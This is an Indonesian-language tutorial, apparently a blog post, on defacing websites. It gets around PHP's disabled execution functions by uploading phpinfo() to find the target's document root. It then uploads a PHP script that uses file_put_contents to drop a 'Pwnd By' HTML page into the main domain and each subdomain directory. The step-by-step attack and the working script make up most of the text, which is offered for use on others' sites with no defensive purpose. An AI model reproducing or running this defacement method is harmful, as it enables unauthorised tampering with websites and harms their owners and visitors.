Deface page bypass disable_functions without using php.ini
Apa itu deface? , Deface adalah serangan terhadap website dengan berbagai cara untuk merubah tampilan pada halaman website tersebut.
Kali ini saya akan memberi tahu cara bagaimana tetap bisa menyisipkan file pada website target meskipun server target mendisable function-function seperti system,exec,passthru dll hanya dengan upload phpinfo() dan function file_put_contents, Masalah utamanya adalah ketika upload big webshell selalu mendapatkan respon forbiden meskipun sudah berbagai macam bypass webshel.
Berikut langkah-langkah bagaimana saya membypassnya :
- Upload phpinfo() ke target
2. Cari path websitenya dengan melihat value pada DOCUMENT_ROOT
Didapatkan path web tersebut adalah /home/*******/public_html/ujian, nah bagaimana caranya agar tetap bisa upload file.html ke semua subdomain dan domain utama? simak terus yaa….
3. Asumsikan target saya mempunyai 2 subdomain yaitu ( sub.redacted.com, ujian.redacted.com, dan redacted.com sebagai domain utama ), Maka perlu kita catat path subdo masing-masingnya :
home/*******/public_html/ujian,
home/*******/public_html/sub,
dan home/*******/public_html/4. Membuat php file creator
<?php$fileContent = "Pwnd By https://kresec.medium.com/ "; //$fileContent = file_get_contents('pastebin/raw/random') "; // mengambil source html$filePath = array("/home/*******/public_html/ks.html","/home/*******/public_html/ujian/ks.html","/home/*******/public_html/sub/ks.html");foreach ($filePath as $path) {if (file_put_contents($path, $fileContent) !== false) {echo " File created (" . basename($path) . "). <br>";} else {echo " Cannot create the file (" . basename($path) . ").";}}?>
5. Eksekusi
- Upload go.php
- Akses go.php
- ks.html uploaded to all dir in array
DONE!!
Terimakasih.
